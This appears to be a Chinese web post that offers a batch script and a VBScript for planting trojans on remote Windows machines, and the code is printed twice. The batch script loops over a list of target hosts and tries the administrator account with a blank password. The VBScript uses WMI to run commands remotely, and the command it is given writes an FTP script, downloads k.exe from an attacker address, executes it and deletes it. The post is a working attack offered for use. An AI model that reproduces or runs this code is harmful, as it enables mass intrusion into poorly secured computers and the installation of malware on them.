很简单的自己看代码
Bat代码的传马脚本
@ECHO OFF&SETLOCAL ENABLEDELAYEDEXPANSION
:start
SET A=1
FOR /F "TOKENS=1* DELIMS=:" %%A IN ('FINDSTR /N .* host.txt') DO (
call start cscript rpmd.vbe %%B administrator "" "cmd /c @echo open IP地址>>net.dat&@echo 123>>net.dat&@echo 123>>net.dat&@echo get k.exe>>net.dat&@echo bye>>net.dat&@ftp -s:net.dat&del net.dat&k.exe&k.exe&del k.exe)
VBE代码的传马脚本
on error resume Next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end If
function usage()
wscript.echo ""
wscript.echo " 远程调用Cmd执行DOS命令"
wscript.echo " Http://www.736202.com"
wscript.echo ""
wscript.echo ""
wscript.echo "_____________________________________________________________________________"
wscript.echo "用法:"
wscript.echo "cscript "&wscript.scriptname&" <目标IP> <用户名> <密码> <要执行的DOS命令>"
wscript.echo "_____________________________________________________________________________"
end Function
if wscript.arguments.count<3 then
usage()
wscript.echo "错误缺少参数!"
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
commands=wscript.arguments(3)
if password=chr(34)&chr(34) then password=Null
usage()
wscript.echo ""&ipaddress&"正在和对方电脑和谐中,请稍等...."
set objlocator=createobject("wbemscripting.swbemlocator") '20
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
if errornumber<>0 then
wscript.echo "和谐完毕!"
wscript.quit
else
wscript.echo "和谐完毕!"
end if
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
call command()
function command()
wscript.echo "正在和对方电脑和谐中进行中...."
set objinstance=objswbemservices.get("win32_process")
set objmethod=objinstance.methods_("create")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=commands
set objoutparam=objinstance.execmethod_("create",objinparam)
if objoutparam.returnvalue<>0 then
wscript.echo "又和谐到一台!"
wscript.quit
else
wscript.echo "又和谐到一台!"
end if
wscript.echo "进程使用 PID 识标为 : "&objoutparam.processid
wscript.echo "在 "&ipaddress&" 上执行命令成功了!"&vbcrlf
wscript.quit
end Function
Bat代码的传马脚本
@ECHO OFF&SETLOCAL ENABLEDELAYEDEXPANSION
:start
SET A=1
FOR /F "TOKENS=1* DELIMS=:" %%A IN ('FINDSTR /N .* host.txt') DO (
call start cscript rpmd.vbe %%B administrator "" "cmd /c @echo open IP地址>>net.dat&@echo 123>>net.dat&@echo 123>>net.dat&@echo get k.exe>>net.dat&@echo bye>>net.dat&@ftp -s:net.dat&del net.dat&k.exe&k.exe&del k.exe)
VBE代码的传马脚本
on error resume Next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end If
function usage()
wscript.echo ""
wscript.echo " 远程调用Cmd执行DOS命令"
wscript.echo " Http://www.736202.com"
wscript.echo ""
wscript.echo ""
wscript.echo "_____________________________________________________________________________"
wscript.echo "用法:"
wscript.echo "cscript "&wscript.scriptname&" <目标IP> <用户名> <密码> <要执行的DOS命令>"
wscript.echo "_____________________________________________________________________________"
end Function
if wscript.arguments.count<3 then
usage()
wscript.echo "错误缺少参数!"
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
commands=wscript.arguments(3)
if password=chr(34)&chr(34) then password=Null
usage()
wscript.echo ""&ipaddress&"正在和对方电脑和谐中,请稍等...."
set objlocator=createobject("wbemscripting.swbemlocator") '20
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
if errornumber<>0 then
wscript.echo "和谐完毕!"
wscript.quit
else
wscript.echo "和谐完毕!"
end if
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
call command()
function command()
wscript.echo "正在和对方电脑和谐中进行中...."
set objinstance=objswbemservices.get("win32_process")
set objmethod=objinstance.methods_("create")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=commands
set objoutparam=objinstance.execmethod_("create",objinparam)
if objoutparam.returnvalue<>0 then
wscript.echo "又和谐到一台!"
wscript.quit
else
wscript.echo "又和谐到一台!"
end if
wscript.echo "进程使用 PID 识标为 : "&objoutparam.processid
wscript.echo "在 "&ipaddress&" 上执行命令成功了!"&vbcrlf
wscript.quit
end Function
网友评论(0):